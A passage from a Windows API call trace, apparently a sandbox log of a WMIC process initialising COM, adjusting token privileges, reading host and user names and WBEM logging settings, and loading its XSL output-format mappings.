pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0287.531] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x7a47f8) returned 0x0 [0287.564] GetCurrentProcess () returned 0xffffffff [0287.564] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x4bfa38 | out: TokenHandle=0x4bfa38*=0x194) returned 1 [0287.564] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfa34 | out: TokenInformation=0x0, ReturnLength=0x4bfa34) returned 0 [0287.564] malloc (_Size=0x118) returned 0x4126b0 [0287.564] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x4126b0, TokenInformationLength=0x118, ReturnLength=0x4bfa34 | out: TokenInformation=0x4126b0, ReturnLength=0x4bfa34) returned 1 [0287.564] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x4126b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0287.564] free (_Block=0x4126b0) [0287.564] CloseHandle (hObject=0x194) returned 1 [0287.564] malloc (_Size=0x40) returned 0x4126b0 [0287.564] malloc (_Size=0x40) returned 0x4126f8 [0287.564] malloc (_Size=0x40) returned 0x412740 [0287.565] SetThreadUILanguage (LangId=0x0) returned 0x340409 [0287.569] _vsnwprintf (in: _Buffer=0x412740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x4bf9c0 | out: _Buffer="ms_409") returned 6 [0287.569] malloc (_Size=0x20) returned 0x4111f8 [0287.569] GetComputerNameW (in: lpBuffer=0x4111f8, nSize=0x4bfa24 | out: lpBuffer="NQDPDE", nSize=0x4bfa24) returned 1 [0287.569] lstrlenW (lpString="NQDPDE") returned 6 [0287.569] malloc (_Size=0xe) returned 0x412788 [0287.569] lstrlenW (lpString="NQDPDE") returned 6 [0287.569] ResolveDelayLoadedAPI () returned 0x7444db00 [0287.569] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x4bfa38 | out: lpNameBuffer=0x0, nSize=0x4bfa38) returned 0x34b000 [0287.571] GetLastError () returned 0xea [0287.571] malloc (_Size=0x1e) returned 0x4127a0 [0287.571] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4127a0, nSize=0x4bfa38 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x4bfa38) returned 0x1 [0287.572] lstrlenW (lpString="") returned 0 [0287.572] lstrlenW (lpString="NQDPDE") returned 6 [0287.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0287.573] lstrlenW (lpString=".") returned 1 [0287.574] lstrlenW (lpString="NQDPDE") returned 6 [0287.574] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0287.574] lstrlenW (lpString="LOCALHOST") returned 9 [0287.574] lstrlenW (lpString="NQDPDE") returned 6 [0287.574] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0287.574] lstrlenW (lpString="NQDPDE") returned 6 [0287.574] lstrlenW (lpString="NQDPDE") returned 6 [0287.574] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0287.574] free (_Block=0x412788) [0287.574] lstrlenW (lpString="NQDPDE") returned 6 [0287.574] malloc (_Size=0xe) returned 0x412788 [0287.574] lstrlenW (lpString="NQDPDE") returned 6 [0287.574] lstrlenW (lpString="NQDPDE") returned 6 [0287.574] malloc (_Size=0xe) returned 0x4127c8 [0287.574] lstrlenW (lpString="NQDPDE") returned 6 [0287.574] malloc (_Size=0x4) returned 0x4127e0 [0287.574] malloc (_Size=0xc) returned 0x4127f0 [0287.574] ResolveDelayLoadedAPI () returned 0x7745b870 [0287.585] malloc (_Size=0x18) returned 0x412808 [0287.585] malloc (_Size=0xc) returned 0x412828 [0287.585] SysStringLen (param_1="IDENTIFY") returned 0x8 [0287.585] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0287.585] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0287.585] SysStringLen (param_1="IDENTIFY") returned 0x8 [0287.585] malloc (_Size=0x18) returned 0x412840 [0287.585] malloc (_Size=0xc) returned 0x412860 [0287.585] SysStringLen (param_1="IMPERSONATE") returned 0xb [0287.585] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0287.585] SysStringLen (param_1="IMPERSONATE") returned 0xb [0287.585] SysStringLen (param_1="IDENTIFY") returned 0x8 [0287.585] SysStringLen (param_1="IDENTIFY") returned 0x8 [0287.585] SysStringLen (param_1="IMPERSONATE") returned 0xb [0287.585] malloc (_Size=0x18) returned 0x412878 [0287.585] malloc (_Size=0xc) returned 0x412898 [0287.586] SysStringLen (param_1="DELEGATE") returned 0x8 [0287.586] SysStringLen (param_1="IDENTIFY") returned 0x8 [0287.586] SysStringLen (param_1="DELEGATE") returned 0x8 [0287.586] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0287.586] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0287.586] SysStringLen (param_1="DELEGATE") returned 0x8 [0287.586] malloc (_Size=0x18) returned 0x4128b0 [0287.586] malloc (_Size=0xc) returned 0x4128d0 [0287.586] malloc (_Size=0x18) returned 0x4128e8 [0287.586] malloc (_Size=0xc) returned 0x412908 [0287.586] SysStringLen (param_1="NONE") returned 0x4 [0287.586] SysStringLen (param_1="DEFAULT") returned 0x7 [0287.586] SysStringLen (param_1="DEFAULT") returned 0x7 [0287.586] SysStringLen (param_1="NONE") returned 0x4 [0287.586] malloc (_Size=0x18) returned 0x412920 [0287.586] malloc (_Size=0xc) returned 0x412940 [0287.586] SysStringLen (param_1="CONNECT") returned 0x7 [0287.586] SysStringLen (param_1="DEFAULT") returned 0x7 [0287.586] malloc (_Size=0x18) returned 0x412958 [0287.586] malloc (_Size=0xc) returned 0x4104a0 [0287.587] SysStringLen (param_1="CALL") returned 0x4 [0287.587] SysStringLen (param_1="DEFAULT") returned 0x7 [0287.587] SysStringLen (param_1="CALL") returned 0x4 [0287.587] SysStringLen (param_1="CONNECT") returned 0x7 [0287.587] malloc (_Size=0x18) returned 0x4104b8 [0287.587] malloc (_Size=0xc) returned 0x4104d8 [0287.587] SysStringLen (param_1="PKT") returned 0x3 [0287.587] SysStringLen (param_1="DEFAULT") returned 0x7 [0287.587] SysStringLen (param_1="PKT") returned 0x3 [0287.587] SysStringLen (param_1="NONE") returned 0x4 [0287.587] SysStringLen (param_1="NONE") returned 0x4 [0287.587] SysStringLen (param_1="PKT") returned 0x3 [0287.588] malloc (_Size=0x18) returned 0x4129a0 [0287.588] malloc (_Size=0xc) returned 0x4104f0 [0287.588] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0287.588] SysStringLen (param_1="DEFAULT") returned 0x7 [0287.588] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0287.588] SysStringLen (param_1="NONE") returned 0x4 [0287.588] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0287.588] SysStringLen (param_1="PKT") returned 0x3 [0287.588] SysStringLen (param_1="PKT") returned 0x3 [0287.588] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0287.588] malloc (_Size=0x18) returned 0x4129c0 [0287.588] malloc (_Size=0xc) returned 0x410508 [0287.588] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0287.588] SysStringLen (param_1="DEFAULT") returned 0x7 [0287.588] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0287.588] SysStringLen (param_1="PKT") returned 0x3 [0287.588] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0287.588] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0287.588] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0287.588] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0287.588] malloc (_Size=0x18) returned 0x412b40 [0287.588] malloc (_Size=0x40) returned 0x410520 [0287.588] malloc (_Size=0x20a) returned 0x4197c8 [0287.588] GetSystemDirectoryW (in: lpBuffer=0x4197c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0287.589] free (_Block=0x4197c8) [0287.589] malloc (_Size=0xc) returned 0x410568 [0287.589] malloc (_Size=0xc) returned 0x410580 [0287.589] malloc (_Size=0xc) returned 0x412d80 [0287.589] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0287.589] SysStringLen (param_1="\\wbem\\") returned 0x6 [0287.589] free (_Block=0x410568) [0287.589] free (_Block=0x410580) [0287.589] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0287.589] free (_Block=0x412d80) [0287.589] malloc (_Size=0xc) returned 0x419868 [0287.589] malloc (_Size=0xc) returned 0x4199b8 [0287.589] malloc (_Size=0xc) returned 0x419808 [0287.589] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0287.589] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0287.590] free (_Block=0x419868) [0287.590] free (_Block=0x4199b8) [0287.590] GetCurrentThreadId () returned 0x11d8 [0287.590] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x4bf548 | out: phkResult=0x4bf548*=0x1a0) returned 0x0 [0287.590] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x4bf554, lpcbData=0x4bf550*=0x400 | out: lpType=0x0, lpData=0x4bf554*=0x30, lpcbData=0x4bf550*=0x4) returned 0x0 [0287.590] _wcsicmp (_String1="0", _String2="1") returned -1 [0287.590] _wcsicmp (_String1="0", _String2="2") returned -2 [0287.590] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x4bf550*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x4bf550*=0x42) returned 0x0 [0287.590] malloc (_Size=0x86) returned 0x412d80 [0287.590] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x412d80, lpcbData=0x4bf550*=0x42 | out: lpType=0x0, lpData=0x412d80*=0x25, lpcbData=0x4bf550*=0x42) returned 0x0 [0287.590] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0287.590] malloc (_Size=0x42) returned 0x412e10 [0287.590] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0287.590] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x4bf554, lpcbData=0x4bf550*=0x400 | out: lpType=0x0, lpData=0x4bf554*=0x36, lpcbData=0x4bf550*=0xc) returned 0x0 [0287.590] _wtol (_String="65536") returned 65536 [0287.591] free (_Block=0x412d80) [0287.591] RegCloseKey (hKey=0x0) returned 0x6 [0287.591] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x4bf9e4 | out: ppv=0x4bf9e4*=0x9945a8) returned 0x0 [0287.629] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x9945a8, xmlSource=0x4bf968*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x4bf9d0 | out: isSuccessful=0x4bf9d0*=0xffff) returned 0x0 [0287.791] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x9945a8, DOMElement=0x4bf9e0 | out: DOMElement=0x4bf9e0*=0x996b48) returned 0x0 [0287.792] malloc (_Size=0xc) returned 0x419970 [0287.793] IXMLDOMElement:getElementsByTagName (in: This=0x996b48, tagName="XSLFORMAT", resultList=0x4bf9dc | out: resultList=0x4bf9dc*=0x999ca0) returned 0x0 [0287.794] free (_Block=0x419970) [0287.794] IXMLDOMNodeList:get_length (in: This=0x999ca0, listLength=0x4bf9d8 | out: listLength=0x4bf9d8*=21) returned 0x0 [0287.794] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=0, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.795] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="texttable.xsl") returned 0x0 [0287.795] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.795] malloc (_Size=0xc) returned 0x4199a0 [0287.795] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.795] free (_Block=0x4199a0) [0287.795] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0287.795] malloc (_Size=0xc) returned 0x419880 [0287.795] malloc (_Size=0xc) returned 0x4198f8 [0287.795] malloc (_Size=0x18) returned 0x412c80 [0287.796] IUnknown:Release (This=0x996b88) returned 0x0 [0287.796] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.796] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.796] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=1, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.796] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="textvaluelist.xsl") returned 0x0 [0287.796] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.796] malloc (_Size=0xc) returned 0x4199b8 [0287.796] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.796] free (_Block=0x4199b8) [0287.796] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0287.796] malloc (_Size=0xc) returned 0x419898 [0287.797] malloc (_Size=0xc) returned 0x419850 [0287.797] SysStringLen (param_1="VALUE") returned 0x5 [0287.797] SysStringLen (param_1="TABLE") returned 0x5 [0287.797] SysStringLen (param_1="TABLE") returned 0x5 [0287.797] SysStringLen (param_1="VALUE") returned 0x5 [0287.797] malloc (_Size=0x18) returned 0x412cc0 [0287.797] IUnknown:Release (This=0x996b88) returned 0x0 [0287.797] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.797] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.797] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=2, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.802] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="textvaluelist.xsl") returned 0x0 [0287.802] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.803] malloc (_Size=0xc) returned 0x4197f0 [0287.803] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.803] free (_Block=0x4197f0) [0287.803] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0287.803] malloc (_Size=0xc) returned 0x4197f0 [0287.803] malloc (_Size=0xc) returned 0x419820 [0287.803] SysStringLen (param_1="LIST") returned 0x4 [0287.803] SysStringLen (param_1="TABLE") returned 0x5 [0287.803] malloc (_Size=0x18) returned 0x412b60 [0287.803] IUnknown:Release (This=0x996b88) returned 0x0 [0287.803] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.803] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.803] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=3, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.804] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="rawxml.xsl") returned 0x0 [0287.804] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.804] malloc (_Size=0xc) returned 0x4198b0 [0287.804] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.804] free (_Block=0x4198b0) [0287.804] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0287.804] malloc (_Size=0xc) returned 0x4199b8 [0287.804] malloc (_Size=0xc) returned 0x419928 [0287.804] SysStringLen (param_1="RAWXML") returned 0x6 [0287.804] SysStringLen (param_1="TABLE") returned 0x5 [0287.804] SysStringLen (param_1="RAWXML") returned 0x6 [0287.804] SysStringLen (param_1="LIST") returned 0x4 [0287.804] SysStringLen (param_1="LIST") returned 0x4 [0287.804] SysStringLen (param_1="RAWXML") returned 0x6 [0287.804] malloc (_Size=0x18) returned 0x412a00 [0287.805] IUnknown:Release (This=0x996b88) returned 0x0 [0287.805] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.805] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.805] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=4, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.805] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="htable.xsl") returned 0x0 [0287.805] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.805] malloc (_Size=0xc) returned 0x4198e0 [0287.805] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.805] free (_Block=0x4198e0) [0287.805] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0287.805] malloc (_Size=0xc) returned 0x419910 [0287.805] malloc (_Size=0xc) returned 0x419940 [0287.806] SysStringLen (param_1="HTABLE") returned 0x6 [0287.806] SysStringLen (param_1="TABLE") returned 0x5 [0287.806] SysStringLen (param_1="HTABLE") returned 0x6 [0287.806] SysStringLen (param_1="LIST") returned 0x4 [0287.806] malloc (_Size=0x18) returned 0x412ca0 [0287.806] IUnknown:Release (This=0x996b88) returned 0x0 [0287.806] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.806] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.806] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=5, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.806] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="hform.xsl") returned 0x0 [0287.806] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.806] malloc (_Size=0xc) returned 0x4198b0 [0287.806] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.806] free (_Block=0x4198b0) [0287.807] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0287.807] malloc (_Size=0xc) returned 0x419838 [0287.807] malloc (_Size=0xc) returned 0x4199a0 [0287.807] SysStringLen (param_1="HFORM") returned 0x5 [0287.807] SysStringLen (param_1="TABLE") returned 0x5 [0287.807] SysStringLen (param_1="HFORM") returned 0x5 [0287.807] SysStringLen (param_1="LIST") returned 0x4 [0287.807] SysStringLen (param_1="HFORM") returned 0x5 [0287.807] SysStringLen (param_1="HTABLE") returned 0x6 [0287.807] malloc (_Size=0x18) returned 0x412a60 [0287.807] IUnknown:Release (This=0x996b88) returned 0x0 [0287.807] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.807] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.807] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=6, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.807] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="xml.xsl") returned 0x0 [0287.807] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.808] malloc (_Size=0xc) returned 0x419868 [0287.808] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.808] free (_Block=0x419868) [0287.808] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0287.808] malloc (_Size=0xc) returned 0x419868 [0287.808] malloc (_Size=0xc) returned 0x419958 [0287.808] SysStringLen (param_1="XML") returned 0x3 [0287.808] SysStringLen (param_1="TABLE") returned 0x5 [0287.808] SysStringLen (param_1="XML") returned 0x3 [0287.808] SysStringLen (param_1="VALUE") returned 0x5 [0287.808] SysStringLen (param_1="VALUE") returned 0x5 [0287.808] SysStringLen (param_1="XML") returned 0x3 [0287.808] malloc (_Size=0x18) returned 0x412ba0 [0287.808] IUnknown:Release (This=0x996b88) returned 0x0 [0287.808] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.808] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.808] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=7, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.809] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="mof.xsl") returned 0x0 [0287.809] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.809] malloc (_Size=0xc) returned 0x4198b0 [0287.809] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.809] free (_Block=0x4198b0) [0287.809] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0287.809] malloc (_Size=0xc) returned 0x419970 [0287.809] malloc (_Size=0xc) returned 0x419988 [0287.809] SysStringLen (param_1="MOF") returned 0x3 [0287.809] SysStringLen (param_1="TABLE") returned 0x5 [0287.809] SysStringLen (param_1="MOF") returned 0x3 [0287.809] SysStringLen (param_1="LIST") returned 0x4 [0287.809] SysStringLen (param_1="MOF") returned 0x3 [0287.809] SysStringLen (param_1="RAWXML") returned 0x6 [0287.809] SysStringLen (param_1="LIST") returned 0x4 [0287.809] SysStringLen (param_1="MOF") returned 0x3 [0287.810] malloc (_Size=0x18) returned 0x412bc0 [0287.810] IUnknown:Release (This=0x996b88) returned 0x0 [0287.810] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.810] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.810] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=8, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.810] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="csv.xsl") returned 0x0 [0287.810] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.810] malloc (_Size=0xc) returned 0x4198b0 [0287.810] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.810] free (_Block=0x4198b0) [0287.810] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0287.810] malloc (_Size=0xc) returned 0x4198b0 [0287.811] malloc (_Size=0xc) returned 0x4198c8 [0287.811] SysStringLen (param_1="CSV") returned 0x3 [0287.811] SysStringLen (param_1="TABLE") returned 0x5 [0287.811] SysStringLen (param_1="CSV") returned 0x3 [0287.811] SysStringLen (param_1="LIST") returned 0x4 [0287.811] SysStringLen (param_1="CSV") returned 0x3 [0287.811] SysStringLen (param_1="HTABLE") returned 0x6 [0287.811] SysStringLen (param_1="CSV") returned 0x3 [0287.811] SysStringLen (param_1="HFORM") returned 0x5 [0287.811] malloc (_Size=0x18) returned 0x412a80 [0287.811] IUnknown:Release (This=0x996b88) returned 0x0 [0287.811] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.811] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.811] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=9, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.811] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: 